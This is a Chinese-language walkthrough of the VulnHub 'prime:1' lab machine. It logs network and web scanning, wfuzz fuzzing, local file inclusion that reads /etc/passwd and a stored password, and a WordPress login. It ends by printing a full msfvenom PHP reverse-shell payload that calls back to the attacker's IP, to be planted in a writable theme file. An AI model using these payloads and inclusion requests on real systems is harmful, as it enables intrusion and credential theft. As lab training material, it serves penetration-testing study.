vuInhub靶场实战系列--prime:1

news2024/11/18 6:03:56

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关。

目录

  • 免责声明
  • 前言
  • 一、环境配置
    • 1.1 靶场信息
    • 1.2 靶场配置
  • 二、信息收集
    • 2.1 主机发现
      • 2.1.1 netdiscover
      • 2.1.2 nmap主机扫描
      • 2.1.3 arp-scan主机扫描
    • 2.2 端口扫描
      • 2.2.1 masscan扫描
      • 2.2.2 nmap扫描
    • 2.3 指纹识别
    • 2.4 目录扫描
      • 2.4.1 dirb目录扫描
      • 2.4.2 dirsearch目录扫描
    • 2.5 漏洞切入点
      • 2.5.1 访问登录页
      • 2.5.2 访问dev页
      • 2.5.3 访问wordpress页
      • 2.5.4 poc扫描
  • 三、渗透测试
    • 3.1 wfuzz和LFI
      • 3.1.1 wfuzz爆破参数
      • 3.1.2 LFI
        • 3.1.2.1 file参数
        • 3.1.2.2 secrettier360参数
          • 3.1.2.2.1 secrettier360=
          • 3.1.2.2.2 secrettier360=FUZZ
          • 3.1.2.2.3 secrettier360=dev
          • 3.1.2.2.4 secrettier360=/etc/passwd
          • 3.1.2.2.5 secrettier360=/home/saket/password.txt
    • 3.2 WordPress漏洞
      • 3.2.1 列举用户名
        • 3.2.1.1 cmseek扫描
        • 3.2.1.2 wpscan扫描
      • 3.2.2 登录管理页
      • 3.2.3 msfconsole
        • 3.2.3.1 msfvenom生成反弹shell
        • 3.2.3.2 msf监听4567端口
        • 3.2.3.3 访问测试
    • 3.3 Linux内核漏洞提权
      • 3.3.1 漏洞查找
      • 3.3.2 复制poc
      • 3.3.3 编译poc文件
      • 3.3.4 上传编译poc
      • 3.3.5 执行编译poc
        • 3.3.5.1 目录切换
        • 3.3.5.2 赋予可执行权限
        • 3.3.5.3 执行编译文件
  • 渗透总结
  • 参考文章


前言

今日测试内容渗透prime:1靶机:

Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍prime:1靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)、wpscan、msf、netcat、反弹shell、linux内核提权等内容。

Description
Back to the Top
This machine is designed for those one who is trying to prepare for OSCP or OSCP-Exam.
This is first level of prime series. Some help at every stage is given. Machine is lengthy as OSCP and Hackthebox’s machines are designed.
So you have a target to get root flag as well as user flag. If stuck on a point some help are given at a level of enumeration. If any extra help needed
Visit our website http://hacknpentest.com and http://hnpsecurity.com.
Some extra improvement needed to my VM please contact me on my email- suraj at hnpsecurity dot com.


一、环境配置

1.1 靶场信息

官方链接https://www.vulnhub.com/entry/prime-1,358/
发布日期2019年9月1日
靶场大小2.2GB
作者Suraj Pandey
系列Prime
难度★★☆☆☆

1.2 靶场配置

  • 渗透测试环境配置,请参考作者前面的内容vuInhub靶场实战系列-DC-2实战

二、信息收集

2.1 主机发现

2.1.1 netdiscover

┌──(root㉿kali)-[/home/kali]
└─# netdiscover -i eth0 -r 192.168.6.0/24   
 Currently scanning: Finished!   |   Screen View: Unique Hosts                     
                                                                                   
 169 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 10140               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.6.1     00:50:56:c0:00:08    148    8880  VMware, Inc.                    
 192.168.6.2     00:50:56:f5:7b:9f     14     840  VMware, Inc.                    
 192.168.6.162   00:0c:29:0a:67:ce      5     300  VMware, Inc.                    
 192.168.6.254   00:50:56:ec:e5:84      2     120  VMware, Inc.                                                                   

2.1.2 nmap主机扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap -sP 192.168.6.0/24              
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-05 07:45 EDT
Nmap scan report for 192.168.6.1
Host is up (0.00025s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.6.2
Host is up (0.00020s latency).
MAC Address: 00:50:56:F5:7B:9F (VMware)
Nmap scan report for 192.168.6.162
Host is up (0.0011s latency).
MAC Address: 00:0C:29:0A:67:CE (VMware)
Nmap scan report for 192.168.6.254
Host is up (0.0016s latency).
MAC Address: 00:50:56:EC:E5:84 (VMware)
Nmap scan report for 192.168.6.66
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 28.20 seconds
 

2.1.3 arp-scan主机扫描

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.6.66
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.1	00:50:56:c0:00:08	VMware, Inc.
192.168.6.2	00:50:56:f5:7b:9f	VMware, Inc.
192.168.6.162	00:0c:29:0a:67:ce	VMware, Inc.
192.168.6.254	00:50:56:ec:e5:84	VMware, Inc.
192.168.6.1	00:50:56:c0:00:08	VMware, Inc. (DUP: 2)


综上所述的三种扫描方式,获得靶机信息
IP地址:192.168.6.162
MAC地址:00:0c:29:0a:67:ce

2.2 端口扫描

2.2.1 masscan扫描

┌──(root㉿kali)-[/home/kali]
└─# masscan --rate=10000 --ports 0-65535 192.168.6.162
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2024-06-05 11:48:48 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 22/tcp on 192.168.6.162     

2.2.2 nmap扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA prime-1 192.168.6.162
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-05 07:51 EDT
Nmap scan report for 192.168.6.162
Host is up (0.00079s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
|   256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_  256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: HacknPentest
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:0A:67:CE (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.65 seconds

综上所述,获得靶机开放的端口信息:
22端口:ssh服务 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80端口:http服务 Apache httpd 2.4.18 ((Ubuntu))

2.3 指纹识别

┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.6.162
WhatWeb report for http://192.168.6.162
Status    : 200 OK
Title     : HacknPentest
IP        : 192.168.6.162
Country   : RESERVED, ZZ

Summary   : Apache[2.4.18], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)]

Detected Plugins:
[ Apache ]
	The Apache HTTP Server Project is an effort to develop and 
	maintain an open-source HTTP server for modern operating 
	systems including UNIX and Windows NT. The goal of this 
	project is to provide a secure, efficient and extensible 
	server that provides HTTP services in sync with the current 
	HTTP standards. 

	Version      : 2.4.18 (from HTTP Server Header)
	Google Dorks: (3)
	Website     : http://httpd.apache.org/

[ HTTPServer ]
	HTTP server header string. This plugin also attempts to 
	identify the operating system from the server header. 

	OS           : Ubuntu Linux
	String       : Apache/2.4.18 (Ubuntu) (from server string)

HTTP Headers:
	HTTP/1.1 200 OK
	Date: Wed, 05 Jun 2024 11:54:25 GMT
	Server: Apache/2.4.18 (Ubuntu)
	Vary: Accept-Encoding
	Content-Encoding: gzip
	Content-Length: 132
	Connection: close
	Content-Type: text/html; charset=UTF-8
	

获得一些关键信息;
Summary : Apache[2.4.18], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)]
获得信息和上一步进行端口扫描差不多。

2.4 目录扫描

2.4.1 dirb目录扫描

┌──(root㉿kali)-[/home/kali]
└─# dirb http://192.168.6.162

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Jun  5 07:56:25 2024
URL_BASE: http://192.168.6.162/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.6.162/ ----
+ http://192.168.6.162/dev (CODE:200|SIZE:131)                                                                                                   
+ http://192.168.6.162/index.php (CODE:200|SIZE:136)                                                                                             
==> DIRECTORY: http://192.168.6.162/javascript/                                                                                                  
+ http://192.168.6.162/server-status (CODE:403|SIZE:278)                                                                                         
==> DIRECTORY: http://192.168.6.162/wordpress/                                                                                                   
                                                                                                                                                 
---- Entering directory: http://192.168.6.162/javascript/ ----
==> DIRECTORY: http://192.168.6.162/javascript/jquery/                                                                                           
                                                                                                                                                 
---- Entering directory: http://192.168.6.162/wordpress/ ----
+ http://192.168.6.162/wordpress/index.php (CODE:301|SIZE:0)                                                                                     
==> DIRECTORY: http://192.168.6.162/wordpress/wp-admin/                                                                                          
==> DIRECTORY: http://192.168.6.162/wordpress/wp-content/                                                                                        
==> DIRECTORY: http://192.168.6.162/wordpress/wp-includes/                                                                                       
+ http://192.168.6.162/wordpress/xmlrpc.php (CODE:405|SIZE:42)                                                                                   
                                                                                                                                                 
---- Entering directory: http://192.168.6.162/javascript/jquery/ ----
+ http://192.168.6.162/javascript/jquery/jquery (CODE:200|SIZE:284394)                                                                           
                                                                                                                                                 
---- Entering directory: http://192.168.6.162/wordpress/wp-admin/ ----
+ http://192.168.6.162/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)                                                                            
==> DIRECTORY: http://192.168.6.162/wordpress/wp-admin/css/                                                                                      
==> DIRECTORY: http://192.168.6.162/wordpress/wp-admin/images/                                                                                   
==> DIRECTORY: http://192.168.6.162/wordpress/wp-admin/includes/                                                                                 
+ http://192.168.6.162/wordpress/wp-admin/index.php (CODE:302|SIZE:0)                                                                            
==> DIRECTORY: http://192.168.6.162/wordpress/wp-admin/js/                                                                                       
==> DIRECTORY: http://192.168.6.162/wordpress/wp-admin/maint/                                                                                    
==> DIRECTORY: http://192.168.6.162/wordpress/wp-admin/network/                                                                                  
==> DIRECTORY: http://192.168.6.162/wordpress/wp-admin/user/                                                                                     
                                                                                                                                                 
---- Entering directory: http://192.168.6.162/wordpress/wp-content/ ----
+ http://192.168.6.162/wordpress/wp-content/index.php (CODE:200|SIZE:0)                                                                          
==> DIRECTORY: http://192.168.6.162/wordpress/wp-content/plugins/                                                                                
==> DIRECTORY: http://192.168.6.162/wordpress/wp-content/themes/                                                                                 
==> DIRECTORY: http://192.168.6.162/wordpress/wp-content/uploads/                                                                                
                                                                                                                                                 
---- Entering directory: http://192.168.6.162/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.6.162/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.6.162/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.6.162/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.6.162/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.6.162/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.6.162/wordpress/wp-admin/network/ ----
+ http://192.168.6.162/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)                                                                    
+ http://192.168.6.162/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)                                                                    
                                                                                                                                                 
---- Entering directory: http://192.168.6.162/wordpress/wp-admin/user/ ----
+ http://192.168.6.162/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                                       
+ http://192.168.6.162/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)                                                                       
                                                                                                                                                 
---- Entering directory: http://192.168.6.162/wordpress/wp-content/plugins/ ----
+ http://192.168.6.162/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)                                                                  
                                                                                                                                                 
---- Entering directory: http://192.168.6.162/wordpress/wp-content/themes/ ----
+ http://192.168.6.162/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)                                                                   
                                                                                                                                                 
---- Entering directory: http://192.168.6.162/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Wed Jun  5 07:57:25 2024
DOWNLOADED: 46120 - FOUND: 15

┌──(root㉿kali)-[/home/kali]
└─# dirb http://192.168.6.162/ -X .txt,.php,.zip

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Jun  5 08:53:00 2024
URL_BASE: http://192.168.6.162/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.txt,.php,.zip) | (.txt)(.php)(.zip) [NUM = 3]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.6.162/ ----
+ http://192.168.6.162/image.php (CODE:200|SIZE:147)                                                                                             
+ http://192.168.6.162/index.php (CODE:200|SIZE:136)                                                                                             
+ http://192.168.6.162/secret.txt (CODE:200|SIZE:412)                                                                                            
                                                                                                                                                 
-----------------
END_TIME: Wed Jun  5 08:53:14 2024
DOWNLOADED: 13836 - FOUND: 3

                                                                                       

bash终端显示的日志前面有“+”表示扫描出的网站目录。

2.4.2 dirsearch目录扫描

┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.6.162 -e * -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481

Output File: /home/kali/reports/_192.168.6.162/_24-06-05_07-59-25.txt

Target: http://192.168.6.162/

[07:59:25] Starting: 
[07:59:29] 403 -  278B  - /.ht_wsr.txt                                      
[07:59:29] 403 -  278B  - /.htaccess.bak1                                   
[07:59:29] 403 -  278B  - /.htaccess.orig                                   
[07:59:29] 403 -  278B  - /.htaccess.save
[07:59:29] 403 -  278B  - /.htaccess_orig                                   
[07:59:29] 403 -  278B  - /.htaccessBAK                                     
[07:59:29] 403 -  278B  - /.htaccess_sc
[07:59:29] 403 -  278B  - /.htm                                             
[07:59:29] 403 -  278B  - /.html                                            
[07:59:29] 403 -  278B  - /.htaccess_extra                                  
[07:59:29] 403 -  278B  - /.htaccessOLD
[07:59:29] 403 -  278B  - /.htaccessOLD2                                    
[07:59:29] 403 -  278B  - /.htpasswds
[07:59:29] 403 -  278B  - /.htaccess.sample                                 
[07:59:29] 403 -  278B  - /.httr-oauth                                      
[07:59:29] 403 -  278B  - /.htpasswd_test                                   
[07:59:31] 403 -  278B  - /.php3                                            
[07:59:31] 403 -  278B  - /.php                                             
[08:00:03] 200 -  131B  - /dev                                              
[08:00:17] 301 -  319B  - /javascript  ->  http://192.168.6.162/javascript/ 
[08:00:45] 403 -  278B  - /server-status                                    
[08:00:45] 403 -  278B  - /server-status/                                   
[08:01:07] 200 -    1KB - /wordpress/wp-login.php                           
[08:01:07] 200 -    4KB - /wordpress/                                       
                                                                             
Task Completed


测试结果显示,获得一些目录
登录管理页:http://192.168.6.162/wordpress/wp-login.php
http://192.168.6.162/wordpress/wp-content/uploads/
http://192.168.6.162/wordpress/
http://192.168.6.162/dev/

2.5 漏洞切入点

2.5.1 访问登录页

访问链接:
http://192.168.6.162/wordpress/wp-login.php
登录页

2.5.2 访问dev页

测试链接:
http://192.168.6.162/dev
level 0
返回“you are at level 0 stage…”

2.5.3 访问wordpress页

测试链接:
http://192.168.6.162/wordpress/
wordpress

2.5.4 poc扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap --script=vuln -p22,80 192.168.6.162
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-05 08:17 EDT
Nmap scan report for 192.168.6.162
Host is up (0.0017s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| http-enum: 
|   /wordpress/: Blog
|_  /wordpress/wp-login.php: Wordpress login page.
MAC Address: 00:0C:29:0A:67:CE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 334.61 seconds

发现一个编号为:CVE-2007-6750的DOS攻击“ DOS attack”漏洞


三、渗透测试

3.1 wfuzz和LFI

3.1.1 wfuzz爆破参数

┌──(root㉿kali)-[/home/kali]
└─# wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.6.162/index.php?FUZZ
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.6.162/index.php?FUZZ
Total requests: 951

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                          
=====================================================================

000000341:   200        7 L      19 W       206 Ch      "file"                                                                           

Total time: 1.809526
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 525.5519

获得一个file参数,則该靶机存在文件包含漏洞。

3.1.2 LFI

3.1.2.1 file参数

测试连接:
http://192.168.6.162/index.php?file=location.txt
location
提示“use ‘secrettier360’ parameter on some other php page for more fun.”
提示我们使用参数secrettier360

3.1.2.2 secrettier360参数
3.1.2.2.1 secrettier360=

测试连接:
http://192.168.6.162/image.php?secrettier360=
image.php

提示“finaly you got the right parameter”。
我们获得正确的参数。O(∩_∩)O哈哈~

3.1.2.2.2 secrettier360=FUZZ
┌──(root㉿kali)-[/home/kali]
└─# wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 17 http://192.168.6.162/image.php?secrettier360=FUZZ
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.6.162/image.php?secrettier360=FUZZ
Total requests: 951

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                          
=====================================================================

000000257:   200        13 L     43 W       328 Ch      "dev"                                                                            

Total time: 2.187057
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 434.8308

这一步我们获得参数值“dev”

3.1.2.2.3 secrettier360=dev

测试连接:
http://192.168.6.162/image.php?secrettier360=dev
返回提示信息

3.1.2.2.4 secrettier360=/etc/passwd

测试连接:
http://192.168.6.162/image.php?secrettier360=/etc/passwd
etc/passwd

关键信息在最后一行:
password.txt file in my directory:/home/saket: sshd❌122:65534::/var/run/sshd:/usr/sbin/nologin

3.1.2.2.5 secrettier360=/home/saket/password.txt

测试连接:
http://192.168.6.162/image.php?secrettier360=/home/saket/password.txt
获得登录密码

我们至此已经获得登录密码:

序号密码
1follow_the_ippsec

3.2 WordPress漏洞

网站登录页(目标页面)为:http://192.168.6.162/wordpress/

3.2.1 列举用户名

3.2.1.1 cmseek扫描
┌──(root㉿kali)-[/home/kali]
└─# cmseek -u http://192.168.6.162/wordpress/
[i] Updating CMSeeK result index...
[*] Report index updated successfully!

 ___ _  _ ____ ____ ____ _  _
|    |\/| [__  |___ |___ |_/  by @r3dhax0r
|___ |  | ___| |___ |___ | \_ Version 1.1.3 K-RONA


 [+]  CMS Detection And Deep Scan  [+] 

[i] Scanning Site: http://192.168.6.162/wordpress/
[*] CMS Detected, CMS ID: wp, Detection method: generator
[*] Version Detected, WordPress Version 5.2.2
[i] Checking user registration status
[i] Starting passive plugin enumeration
[x] No plugins enumerated!
[i] Starting passive theme enumeration
[*] 1 theme detected!
[i] Starting Username Harvest
[i] Harvesting usernames from wp-json api
[!] Json api method failed trying with next
[i] Harvesting usernames from jetpack public api
[!] No results from jetpack api... maybe the site doesn't use jetpack
[i] Harvesting usernames from wordpress author Parameter
[!] Couldn't enumerate usernames :( 
[i] Checking version vulnerabilities using wpvulns.com
[x] Error Retriving data from wpvulndb

 ___ _  _ ____ ____ ____ _  _
|    |\/| [__  |___ |___ |_/  by @r3dhax0r
|___ |  | ___| |___ |___ | \_ Version 1.1.3 K-RONA


 [+]  Deep Scan Results  [+] 

 ┏━Target: 192.168.6.162
 ┃
 ┠── CMS: WordPress
 ┃    │
 ┃    ├── Version: 5.2.2
 ┃    ╰── URL: https://wordpress.org
 ┃
 ┠──[WordPress Deepscan]
 ┃    │
 ┃    ├── Readme file found: http://192.168.6.162/wordpress//readme.html
 ┃    ├── License file: http://192.168.6.162/wordpress//license.txt
 ┃    │
 ┃    ├── Themes Enumerated: 1
 ┃    │    │
 ┃    │    ╰── Theme: twentynineteen
 ┃    │        │
 ┃    │        ├── Version: 1.4
 ┃    │        ╰── URL: http://192.168.6.162/wordpress//wp-content/themes/twentynineteen
 ┃    │
 ┃
 ┠── Result: /usr/share/cmseek/Result/192.168.6.162_wordpress/cms.json
 ┃
 ┗━Scan Completed in 27.66 Seconds, using 45 Requests



 CMSeeK says ~ Ja mata ne


获得一些关键信息:
CMS: WordPress版本:5.2.2
Theme: twentynineteen 版本:1.4 http://192.168.6.162/wordpress//wp-content/themes/twentynineteen

3.2.1.2 wpscan扫描
┌──(root㉿kali)-[/home/kali]
└─# wpscan --url http://192.168.6.162/wordpress/ --enumerate u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.6.162/wordpress/ [192.168.6.162]
[+] Started: Wed Jun  5 09:44:44 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.6.162/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.6.162/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.6.162/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.6.162/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.6.162/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
 |  - http://192.168.6.162/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.2</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://192.168.6.162/wordpress/wp-content/themes/twentynineteen/
 | Last Updated: 2024-04-02T00:00:00.000Z
 | Readme: http://192.168.6.162/wordpress/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.8
 | Style URL: http://192.168.6.162/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.6.162/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <====================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] victor
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Jun  5 09:44:53 2024
[+] Requests Done: 62
[+] Cached Requests: 6
[+] Data Sent: 15.66 KB
[+] Data Received: 13.341 MB
[+] Memory used: 199.113 MB
[+] Elapsed time: 00:00:08

获得一个用户名:
victor

综上所述,我们已经获得一个用户和一个密码:

序号用户名密码
1victorfollow_the_ippsec

3.2.2 登录管理页

信息如下:

序号项目
1后台管理页http://192.168.6.162/wordpress/wp-login.php
2用户名victor
3用户名follow_the_ippsec

管理页登录成功

登录成功后台管理页,举例最后的成功,不远了。O(∩_∩)O哈哈~
secret.php

在这里找到一个secret.php
提示:“/* ohh Finaly you got a writable file*/”

3.2.3 msfconsole

3.2.3.1 msfvenom生成反弹shell
┌──(root㉿kali)-[/home/kali/prime1]
└─# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.6.66 lport=4567 -o shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1113 bytes
Saved as: shell.php
                                                                                                                                                  
┌──(root㉿kali)-[/home/kali/prime1]
└─# ls
shell.php
                                                                                                                                                  
┌──(root㉿kali)-[/home/kali/prime1]
└─# cat shell.php
/*<?php /**/ error_reporting(0); $ip = '192.168.6.66'; $port = 4567; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();           

已经生成shell.php,将shell.php中注释符号“/*”去除,再将内容复制到上一步的secret.php中,

